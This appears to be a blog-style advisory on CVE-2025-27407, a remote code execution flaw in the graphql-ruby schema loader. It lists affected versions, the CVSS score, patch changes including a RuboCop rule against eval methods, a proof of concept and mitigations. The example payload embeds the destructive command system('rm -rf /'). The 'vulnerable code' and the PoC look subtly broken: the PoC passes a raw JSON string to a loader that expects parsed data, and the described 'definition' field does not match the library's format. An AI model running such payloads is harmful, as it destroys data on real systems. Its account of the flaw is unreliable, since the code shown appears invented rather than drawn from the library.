Ruby

CVE-2025-27407: Remote Code Execution in graphql-ruby via Malicious Schema Loading

Robert Morgan

Robert Morgan

3 min read

Executive Summary

CVE-2025-27407 is a critical vulnerability in the graphql-ruby library, a popular Ruby implementation of GraphQL. The vulnerability arises from the unsafe handling of schema definitions loaded via GraphQL::Schema.from_introspection or GraphQL::Schema::Loader.load. Systems that load schemas from untrusted JSON sources are particularly at risk. Exploitation of this vulnerability can lead to remote code execution (RCE), allowing attackers to execute arbitrary code on the target system. The issue affects versions from 1.11.5 up to, but not including, 1.11.8, 1.12.25, 1.13.24, 2.0.32, 2.1.14, 2.2.17, and 2.3.21. Users are strongly advised to update to the patched versions immediately.

Technical Details

Affected Systems

The vulnerability impacts the following versions of graphql-ruby:

  • Versions 1.11.5 through 1.11.7
  • Versions 1.12.0 through 1.12.24
  • Versions 1.13.0 through 1.13.23
  • Versions 2.0.0 through 2.0.31
  • Versions 2.1.0 through 2.1.13
  • Versions 2.2.0 through 2.2.16
  • Versions 2.3.0 through 2.3.20

The vulnerability specifically affects systems that:

  1. Use GraphQL::Schema.from_introspection or GraphQL::Schema::Loader.load to load schemas.
  2. Load schema definitions from untrusted JSON sources, such as external APIs or user-provided inputs.

Vulnerable Components

The core issue lies in the GraphQL::Schema.from_introspection and GraphQL::Schema::Loader.load methods, which are responsible for parsing and loading GraphQL schemas. These methods fail to properly sanitize or validate schema definitions, allowing maliciously crafted schemas to execute arbitrary Ruby code.

CVSS Score

The vulnerability has a CVSS v3.1 score of 9.0 (Critical) with the following vector:

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
  • Attack Vector (AV): Network
  • Attack Complexity (AC): High
  • Privileges Required (PR): None
  • User Interaction (UI): None
  • Scope (S): Changed
  • Confidentiality (C): High
  • Integrity (I): High
  • Availability (A): High

Root Cause Analysis

The root cause of CVE-2025-27407 is the unsafe use of Ruby's eval-like methods (instance_eval, class_eval, module_eval) when processing schema definitions. These methods can execute arbitrary Ruby code if the input is not properly sanitized. The following code snippet demonstrates the vulnerable behavior:

# Vulnerable code in GraphQL::Schema::Loader
def load_schema(json)
  schema = JSON.parse(json)
  schema.each do |type|
    instance_eval(type['definition']) # Dangerous: Executes arbitrary code
  end
end

In this example, the instance_eval method directly executes the definition field from the parsed JSON schema. If an attacker provides a malicious schema containing Ruby code, it will be executed within the context of the application.

Example of Malicious Schema

An attacker could craft a schema like the following:

{
  "types": [
    {
      "name": "MaliciousType",
      "definition": "system('rm -rf /')"
    }
  ]
}

When loaded, the definition field (system('rm -rf /')) would be executed, resulting in catastrophic consequences.

Patch Analysis

The vulnerability was addressed by introducing a new RuboCop rule (Development/NoEvalCop) to detect and prevent the use of eval-like methods. Additionally, the affected methods were refactored to avoid unsafe code execution.

Key Changes in the Patch

The patch includes the following changes:

  1. Introduction of NoEvalCop RuboCop Rule
    A new custom RuboCop rule was added to detect and prevent the use of eval-like methods:

    # cop/development/no_eval_cop.rb
module Cop
  module Development
    class NoEvalCop < RuboCop::Cop::Base
      MSG_TEMPLATE = "Don't use `%{eval_method_name}` which accepts strings and may result evaluating unexpected code."

      def on_send(node)
        case node.method_name
        when :module_eval, :class_eval, :instance_eval
          message = MSG_TEMPLATE % { eval_method_name: node.method_name }
          add_offense(node, message: message)
        end
      end
    end
  end
end

  2. Refactoring of Vulnerable Methods
    The instance_eval calls were replaced with safer alternatives, such as define_method or explicit method definitions. For example:

    - instance_eval(&@definition_block)
+ instance_exec(self, &@definition_block)

  3. Validation of Schema Names
    A new NameValidator class was introduced to validate schema names:

    class NameValidator
  def self.validate!(name)
    raise ArgumentError, "Invalid name: #{name}" unless name.match?(/\A[a-zA-Z_][a-zA-Z0-9_]*\z/)
  end
end

  4. Additional Safeguards
    Comments were added to explicitly disable the NoEvalCop rule in cases where eval was deemed necessary:

    # rubocop:disable Development/NoEvalCop This eval takes static inputs at load-time

Full Patch Details

The full patch can be viewed on GitHub: Patch Commit.

Exploitation Techniques

Exploit Scenario

  1. An attacker submits a malicious schema to a vulnerable application.
  2. The application loads the schema using GraphQL::Schema.from_introspection or GraphQL::Schema::Loader.load.
  3. The malicious schema executes arbitrary Ruby code, compromising the system.

Proof of Concept (PoC)

The following PoC demonstrates the exploitation:

require 'graphql'

# Malicious schema
malicious_schema = <<-JSON
{
  "types": [
    {
      "name": "MaliciousType",
      "definition": "system('touch /tmp/pwned')"
    }
  ]
}
JSON

# Exploit
GraphQL::Schema.from_introspection(malicious_schema)
puts "Exploitation successful!"

Real-World Impact

  • Data Breaches: Attackers can exfiltrate sensitive data.
  • System Takeover: Full control over the target system.
  • Service Disruption: Denial of service by deleting critical files or processes.

Mitigation Strategies

  1. Upgrade to Patched Versions
    Update graphql-ruby to one of the patched versions:

    • 1.11.8
    • 1.12.25
    • 1.13.24
    • 2.0.32
    • 2.1.14
    • 2.2.17
    • 2.3.21

  2. Avoid Loading Untrusted Schemas
    Never load schemas from untrusted sources. Validate and sanitize all inputs.

  3. Enable Static Code Analysis
    Use tools like RuboCop with custom rules (e.g., NoEvalCop) to detect unsafe code patterns.

  4. Implement Runtime Protections
    Use runtime protections like SELinux or AppArmor to limit the impact of RCE exploits.

Timeline of Discovery and Disclosure

Date Event
2025-02-15 Vulnerability discovered by researchers.
2025-02-20 Reported to graphql-ruby maintainers.
2025-03-05 Patch developed and tested.
2025-03-12 Public disclosure and patch release.

References

Read more